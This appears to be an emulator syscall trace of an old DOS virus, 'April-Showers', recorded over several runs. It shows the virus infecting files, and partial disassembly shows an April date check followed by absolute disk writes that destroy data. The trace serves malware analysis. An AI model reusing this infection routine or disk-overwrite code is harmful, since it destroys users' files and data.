2018-12-25T12:28:52.197309181Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.19979283Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.208471952Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.218997632Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.221970354Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.229660066Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.236467054Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.238559895Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.243894346Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.25360942Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.257230234Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.259651985Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.263042402Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.271873082Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.273571437Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.275928463Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.280335789Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.286874867Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.293831226Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.300017135Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.301827764Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.311401351Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.31793911Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.321613741Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.323520407Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.326174745Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.335029745Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.336546597Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.344002603Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.35453896Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.358324083Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.364931862Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.371419264Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.374209519Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.384555667Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.391353247Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.395320704Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.396718374Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.399398821Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.408848295Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.410431034Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.418163218Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.428577052Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.43129616Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:52.435588609Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:52.438372341Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:52.440333543Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:52.443083463Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:51.823158433Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:51.82566377Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:51.828988896Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:51.835690896Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:51.850235164Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:51.858744491Z	62	PC: 12e49 | Close file
2018-12-25T12:28:51.861266555Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.864450373Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:51.872461899Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.880147927Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.889575137Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.892580576Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:51.910923699Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.919580099Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:51.923583555Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:51.925571694Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:51.929558468Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:51.952929465Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:51.954296316Z	62	PC: 12f4d | Close file
2018-12-25T12:28:51.960080636Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.970438447Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.973864082Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.978308619Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.986613673Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.990518003Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.009344343Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.020082147Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.02408587Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.025949741Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.029491236Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.040411403Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.042260964Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.051387353Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.06259686Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.06548826Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.072792699Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.080429702Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.082404711Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.093456129Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.10149386Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.104576662Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.105959033Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.114241992Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.124858675Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.12683106Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.135735429Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.147351733Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.150586078Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.158051078Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.166364604Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.168686522Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.180333292Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.188912242Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.192303893Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.194147206Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.19833343Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.20907284Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.211028036Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.220383608Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.231787733Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.234812835Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.243756835Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.25189603Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.254543573Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.259858502Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.266324121Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.269580779Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.27140173Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.275437722Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.285273701Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.28724528Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.29049669Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.295321794Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.298338403Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.306538725Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.314192266Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.316417538Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.327595147Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.336676393Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.339923364Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.341628745Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.346097201Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.356662574Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.358473527Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.368253115Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.379972644Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.383340325Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.401848069Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.409080651Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.411137723Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.422358103Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.429932649Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.433632033Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.435563276Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.439989397Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.453332216Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.456461365Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.466311715Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.477228651Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.480005685Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:52.485866713Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:52.488903691Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:52.490913861Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:52.494281681Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:52.018244102Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:52.020204195Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:52.025574135Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:52.032973411Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:52.044036144Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:52.047361646Z	62	PC: 12e49 | Close file
2018-12-25T12:28:52.049791195Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.053169948Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:52.060183826Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.073658121Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.080989739Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.084306646Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:52.100997281Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.113199626Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:52.11760434Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:52.120185996Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:52.123670114Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:52.136630519Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:52.138281355Z	62	PC: 12f4d | Close file
2018-12-25T12:28:52.148515053Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.160059222Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.16391379Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.171687523Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.179258248Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.182965697Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.195338272Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.204539244Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.208676869Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.211066103Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.214684733Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.227107094Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.22909498Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.238389211Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.250515992Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.253589678Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.260978056Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.26940971Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.273814381Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.287546937Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.296178787Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.300526812Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.302725415Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.306470808Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.318065543Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.320218666Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.329451413Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.342694154Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.346127044Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.353877399Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.362184634Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.36455937Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.376017989Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.399279524Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.403259037Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.405178902Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.409393238Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.420773823Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.423001457Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.431973004Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.443800537Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.447286015Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.455148005Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.463211243Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.466182276Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.471532507Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.48327475Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.486511639Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.488509016Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.492543551Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.502356104Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.504022827Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.506987494Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.511883609Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.519025464Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.526784545Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.534003551Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.536030834Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.548852779Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.557423553Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.561104805Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.563299231Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.566644651Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.57516597Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.576788562Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.585714357Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.597472878Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.600807033Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.608923077Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.616467332Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.618439407Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.630253984Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.642335826Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.646090472Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.648659249Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.652468202Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.663025833Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.666061202Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.675528562Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.686522411Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.689543301Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:52.694262862Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:52.696598813Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:52.698509108Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:52.701649446Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')